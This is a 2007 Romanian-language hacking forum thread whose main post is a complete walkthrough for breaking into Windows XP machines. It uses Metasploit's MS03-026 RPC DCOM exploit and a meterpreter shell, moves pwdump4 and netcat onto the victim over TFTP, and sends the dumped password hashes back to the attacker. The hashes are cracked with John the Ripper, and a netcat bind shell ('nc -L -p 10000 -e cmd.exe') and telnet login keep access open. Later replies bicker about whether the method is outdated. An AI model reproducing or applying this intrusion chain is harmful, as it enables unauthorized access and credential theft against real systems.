c0der Posted August 24, 2007 Report Share Posted August 24, 2007 Metasploit Framework v.2.x, Explicare Completa Testat in retea cu succes ! Functioneaza fara probleme in orice retea.All CREDITS goes to c0derTARGET : UN BOX CE RULEAZA SUB PLATFORMA WINDOWS XP SP0/SP1Disclaimer - Citeste Inainte De A Incepe *** ATENTIE *** NU RASPUND PENTRU EVENTUALELE PAGUBE CREATE IN URMA ACTIUNII DE PENTETRARE A SISTEMELOR CU EXPLOITURI.TOATE INFORMATIILE CARE LE-AM SCRIS MAI SUS TREBUIESC FOLOSITE IN SCOP EDUCATIONAL NU PENTRU SCOPURI MALICIOASE SAU DE PENETRARE, NU SUNT PENTRU RAUFACATORI! NU IMI ASUM NICI O RESPONSABILITATE IN TOT CEEA CE INSEAMNA UTILIZAREA ACESTUI PROGRAM! *** ITI TREBUIE SISTEMUL DE OPERARE "BACKTRACK" V.1 sau 2, CA ARE IMPLEMENTATE TOATE PROGRAMELE DE PENETRARE SI SECURITATE ESTE SPECIAL CREAT PENTRU SECURITATEA SI PENETRAREA RETELELOR *** *** FRAZELE MARCATE CU LINIUTA NU SE SCRIU NICAIERI SUNT NISTE FRAZE AJUTATOARE!!!*** *** TOATE FUNCTIILE SE SCRIU FARA GHILIMELE [without quotes] *** *** PENTRU NOOBI *** -dupa fiecare functie scrisa in metasploit apasati tasta ENTER *** IP-UL 192.168.1.35 ESTE IPUL ATACATORULUI ,CELELATE IP-URI SUNT IP-URILE VICTIMEI*** *** PENTRU MAI MULTE DETALII VIZUALIZATI VIDEOCLIPUL DENUMIT "Complete Hacking Video using Metasploit - Meterpreter.swf" *** *** POTI SA LUCREZI SI DIN WINDOWS DAR MAI INDICAT ESTE DINTR-UN ALT SISTEM DE OPERARE CUM AR FI BACKTRACK 2 *** 1) -iti trebuie un program numit NMAP, ca sa scanezi porturile (comenzi de consola, este integrat in BackTrack) - Scanam Victima Astfel: nmap -sT -O 192.168.1.xx nmap -sV 192.168.1.xx -p 23,25,80 nmap -sU 192.168.1.xx ____________________________ 2) Metasploit Framework v 2.x/v.3 -activezi "msfweb", si intri in orice browser vrei, si scrii acolo adresa "http://127.0.0.1:55555/" , si gata intra in baza de date de exploituri. de altfel mai poti sa si activezi prin consola(pt unii este mai lejer asa),activezi consola tot din metasploit, se numeste "msfconsole", sau msfcli, si intri acolo, astepti cateva sec. si intra in consola de exploituri -odata aparuta scrii: _____________________________________ show exploits use "exploitul_ales_de_tine" show payloads set PAYLOAD "payloadul_ales_de_tine" show options set RHOST 192.168.1.xx exploit "...si acum astepti cateva secunde sa se conecteze catre pc-ul tinta..." _________________________________________ | |***exemplu: |show exploits |use msrpc_dcom_ms03_026 |show payloads |set PAYLOAD win32_bind_meterpreter |show options |set RHOST 192.168.1.110 |exploit |________________________________________ - RHOST ESTE TINTA!!! - dupa ce ai scris exploit si ai apasat tasta enter va aparea ceva de genul [*] Starting Reverse Handler. [*] Detected a Windows XP target [*] Sending 8 DCE request fragments... [*] Sending the final DCE fragment [*] Got connection from 192.168.1.35:1146 <=> 192.168.1.110:4444 [*] Sending Stage (2893 bytes) [*] Sleeping before sending dll. [*] Uploading dll to memory (348160), Please wait... [*] Uploading complete. -si daca arata asa este ok esti ca si coneectat,dar pana atunci mai trebuie parcursi cativa pasi. Figura 1 Figura 1 -acum o sa iti apara ceva de genu: [ -= connected to =-] [ -= meterpreter server =-] [ -= v. 0000000500 =-] -sau in orice caz zicea ca s-a conectat, iar in cazul in care nu s-a conectat sau sunt probleme cu serverul[pc-ul] tinta,atunci o sa zica ceva de genu "not connected,exiting bind handler,exiting reverse handler, exit, disconnected,etc...." . in cazul in care a reusit conexiunea o sa iti apara in felu urmator: meterpreter> -si scrii in consola acum "help",si o sa iti apara o lista cu optiunile care le poti scrie in consola -acum scrii: "use -m Process" -si o sa iti apara asa : "loadlib:loading library from 'ext368851.dll' on the remote machine.loadlib:success" -acum scrii iar "help" si o sa iti apara mai multe optiuni, noi scriem: "execute" "execute -f cmd -c" si o sa iti apara asa "execute:executing 'cmd'..., execute:success,process id is 1576,execute:allocated channel 1 for new process" _______________________________________________________________________________________________________________________ **** PENTRU MAI MULTE DETALII VIZUALIZATI VIDEOCLIPUL "Complete Hacking Video using ||Metasploit - Meterpreter.swf" **** _______________________________________________________________________________________________________________________ -bun pana acum, de acum in colo scrii: "interact 1" - si iti apare "interact:switching to interactive console on 1...,interact:started interactive channel 1." -si gata o sa iti apara consola [ms-dos-ul,cmd-ul] sistemului care l-ai penetrat, de fapt gata te-ai conectat la pc-ul victima si ii deti controlul, poti sa ii faci ce vrei la pc,l-ai "spart" -acum o sa iti apara exact consola pc-ului victima si pot sa dai comenzi ms-dos, sau comenzi cmd pentru altii care inteleg, fiecare stie si a lucrat in felul lui -acum scriem in aceeasi consola niste parametri de identificare cum ar fi "ipconfig", "hostname", sau "whoami", pentru a afla detalii despre pc ul victima! (whoami merge decat in win2000) 3) -acum te duci in meniul start din SO backtrack,si urmezi meniul astfel:"Backtrack->backtrack services->tftpd->start tftpd", si astepti trebuie sa iti apara o casuta de dialog in care scrie "tftpd running on port 69 - home directory is /tmp" si ii dam OK. 4) -acum mai cream un SHELL nou din "msfconsole" dand dublu clik imediat in dreapta unde scrie SHELL[ne uitam in partea stanga in coltul de sus al ferestrei "msfconsole"-acolo este situat], si o sa ne apara un shell nou in acelasi terminal "msfconsole" -in shell-ul nou creat scriem: ___________________________________________________ cd /pentest/windows-binaries/tools/ ls cp nc.exe /tmp cd .. ls cd passwd-attack/ ls cp pwdump4.exe /tmp cp pwdump4.dll /tmp cd /pentest/password/dictionaries/ ls gunzip -c wordlist.txt.gz > /tmp/wordlist.txt cd /tmp ls ifconfig eth0 ___________________________________________________ -uite-te in poza de mai jos pentru detaliiFigura 2 Figura 2 5) -acum ne intoarcem la shell-ul nr.1 si scriem (acum trimitem fisierele din pc-ul atacatorului catre pc-ul tinta) : "tftp -i 192.168.1.xx get pwdump4.exe" -si ca a trimis cu succes trebuie sa iti apara 'transfer successful,bla bla' "tftp -i 192.168.1.xx get pwdump4.dll" -idem "tftp -i 192.168.1.xx get nc.exe" -ibidem _________________________________________________ |*** exemplu: | |"tftp -i ip_ul_atacatorului get pwdump4.exe" | |"tftp -i ip_ul_atacatorului get pwdump4.dll" | |"tftp -i ip_ul_atacatorului get nc.exe" | | | |sau | | | |"tftp -i 192.168.1.35 get pwdump4.exe" | |"tftp -i 192.168.1.35 get pwdump4.dll" | |"tftp -i 192.168.1.35 get nc.exe" | |_________________________________________________ -tot in primul shell scriem: "pwdump4" "pwdump4 /l /o:pwdump4.txt" "tftp 192.168.1.xx put pwdump4.txt" _______________________________________ |***exemplu |"tftp 192.168.1.35 put pwdump4.txt" |_____________________________________ 6) - in al doilea shell ne intoarcem: "cat pwdump4.txt" "john -w:wordlist.txt pwdump4.txt" "john --show pwdump4.txt" "john -w:wordlist.txt -f:NT pwdump4.txt" 7) - ne intoarcem la primul shell: "nc -L -p 10000 -e cmd.exe" 8) - ne intoarcem la al doilea shell: "telnet 192.168.1.xx 10000" ______________________________ |***exemplu: |"telnet 192.168.1.110 10000" |sau |"telnet ip_ul_tinta portul" |____________________________ "ipconfig" "whoami" "exit" "telnet 192.168.1.xx" - ne apare serverul de autentificare, la "login" scriem numele crackuit cu programul "pwdump4", exemplu "administrator" iar la "password" parola aflata cu acelasi program.si gata ne-am conectat si la serverul telnet pe calculatorul tinta, si i-am aflat si numele de login si parola . usor pana aici nu?oricum nu mai e mult de efectuat e aproape gata toata treaba. -o sa apara 'welcome to microsoft telnet server.' scriem : "ipconfig" "whoami" si "exit" ca sa te deconectezi daca vrei.atata tot, nimic mai mult! era greu? GAME OVER!!!!! Figura 3 Figura 3 COMENZI LINUX ___________________________________________________________________________________________ -> pentru shell-uri/terminale[shell sau terminal este in SISTEMUL DE OPERARE LINUX CUM ESTE MS-DOS/CMD PENTRU WINDOWS!!!!] si se gaseste imediat in dreapta langa meniul start la LINUX(al doilea buton de jos) <- ___________________________________________________________________________________________ cd = change directory (si se foloseste ca ms-dos din windows, schimba directorul[folderul] curent) - se fol. cd urmat de directorul in care mergi,si se pune bara / dupa fiecare folder exemplu:cd /pentest/windows-binaries/tools/ si te duce in folderul tools ls = iti arata tot ce se afla intr-un folder cp = copy (copiaza un fisier intr-un folder) exemplu: cp nc.exe /tmp ,"cp fisierul /directorul in care va fi copiat fisierul" gunzip = program asemanator cu winrar de arhivare/dezarhivare numai ca se lucreaza din consola cu el exemplu: gunzip -c wordlist.txt.gz > /tmp/wordlist.txt exemplu: gunzip -c fisierul_cu_extensia_.gz > /folderul_ales/fisierul ifconfig = iti afla detalii despre placa de retea, conexiunile,dnsurile,winsurile,gatewayul,subnet maskul,etc cate placi de retea ai poti sa afli la fiecare in parte detalii exemplu: ifconfig eth0,ifconfig eth1, si asa la infinit mai pui o cifra ,depinde cate placi de retea ai tftp = program de transfer fisiere de la un pc la altul[dintr-o retea] exemplu:"tftp -i 192.168.1.35 get pwdump4.exe" "tftp -i ip_ul_atacatorului get nc.exe" cu comenzile astea trimitem la pcul tinta programele pwdump4.exe si nc.exe "tftp 192.168.1.35 put pwdump4.txt" punem in pcul tinta un fisier C. GEORGIAN Quote Link to comment Share on other sites More sharing options...
escalation666 Posted August 24, 2007 Report Share Posted August 24, 2007 Tutorialul video facut de Muts, pe care l-am vazut acu mai mult de un an a fost educativ, dar scenariile din real world is mult mai complexe si compromiterea unui sistem nu merge intotdeauna ca dupa o reteta. Nu trebuie neaparat parcursi exact toti pasii din acel tutorial, cum ar fi de exemplu sa scanezi de trei ori cu nmap, pun pariu ca nici nu stii ce inseamna -sT, -sV, -sS sau -sO etc...Pwdump 4 e outdated, incearca versiunea 6 care este mult mai eficienta, sau poti incerca fgdump. Iar cat despre folosirea tftp-ului ai sa descoperi ca nu merge intotdeanu...because some people really have firewalls you know? Un windows cu update-urile la zi nu este vulnerabil la rpc-dcom sau la ms2000 resolution exploit. Quote Link to comment Share on other sites More sharing options...
c0der Posted August 24, 2007 Author Report Share Posted August 24, 2007 Tutorialul video facut de Muts, pe care l-am vazut acu mai mult de un an a fost educativ, dar scenariile din real world is mult mai complexe si compromiterea unui sistem nu merge intotdeauna ca dupa o reteta. Nu trebuie neaparat parcursi exact toti pasii din acel tutorial, cum ar fi de exemplu sa scanezi de trei ori cu nmap, pun pariu ca nici nu stii ce inseamna -sT, -sV, -sS sau -sO etc...Pwdump 4 e outdated, incearca versiunea 6 care este mult mai eficienta, sau poti incerca fgdump. Iar cat despre folosirea tftp-ului ai sa descoperi ca nu merge intotdeanu...because some people really have firewalls you know? Un windows cu update-urile la zi nu este vulnerabil la rpc-dcom sau la ms2000 resolution exploit.am inteles maestre, oricum este bun tutorialul, iar despre ce inseamna -st, -sv, si alea nu are rost sa ma cert cu tine ca vad ca le stii tu pe toate, probabil te-ai nascut invatat escalasiones?scuza-ma daca nu am dat explicatie la ce inseamna poate dai tu ca tot te dai in barci, m-am suparat din prisma faptului ca imi zici mie ca nu stiu sa scanez in nmap, daca nu stiam nu mai faceam tut asta pe rst intelegi, ah probabil ma acuzi ca nu am explicat ce inseamna ok, de acord ai 1 pct in plus fata de mine, multumit?banuiesc ca iti place sa fi troll? Quote Link to comment Share on other sites More sharing options...
escalation666 Posted August 24, 2007 Report Share Posted August 24, 2007 Troll it's my middle name. Si ca sa inchei ca un veritabil troll ce sunt:Linux rox! windowze sux! voi ce parere aveti? Quote Link to comment Share on other sites More sharing options...
c0der Posted August 24, 2007 Author Report Share Posted August 24, 2007 Troll it's my middle name. Si ca sa inchei ca un veritabil troll ce sunt:Linux rox! windowze sux! voi ce parere aveti? ca sa spui despre x si despre y ca nu stiu unde sa se intersecteze ar trebui sa cunosti coordonatele, cam asa ai facut tu cu mine, m-ai acuzat pe nedrept de ceva care dau dovada de cunostinte[cat de mici sunt ele sunt importante pt mine ca eu m-am chinuit sa le acumulez/invat, cate ceva] si sa dau si mai departe ceea ce stiu eu chiar daca sunt "outdated" oricum omu cat vrea sa invete wa tot neinvatat moare, si ai spus cele recitate de tine mai sus de parca m-ai cunoaste de o viata, ...sau de o secunda?am i right m8?asa ca cn are dreptate? Quote Link to comment Share on other sites More sharing options...
zbeng Posted August 24, 2007 Report Share Posted August 24, 2007 escalation666 incet fiecare ajuta cum stie stim ca tu le stii pe "toate" nuti place faci altu si gata Quote Link to comment Share on other sites More sharing options...
c0der Posted August 24, 2007 Author Report Share Posted August 24, 2007 oricum escalation apreciez stirile tale de mai sus, gata iti trece tie Quote Link to comment Share on other sites More sharing options...
moubik Posted August 24, 2007 Report Share Posted August 24, 2007 Troll it's my middle name. Si ca sa inchei ca un veritabil troll ce sunt:Linux rox! windowze sux! voi ce parere aveti? escalation, invata sa iei de la fiecare ce e mai bun. nu trebuie sa te inchizi intr-unul din ele Quote Link to comment Share on other sites More sharing options...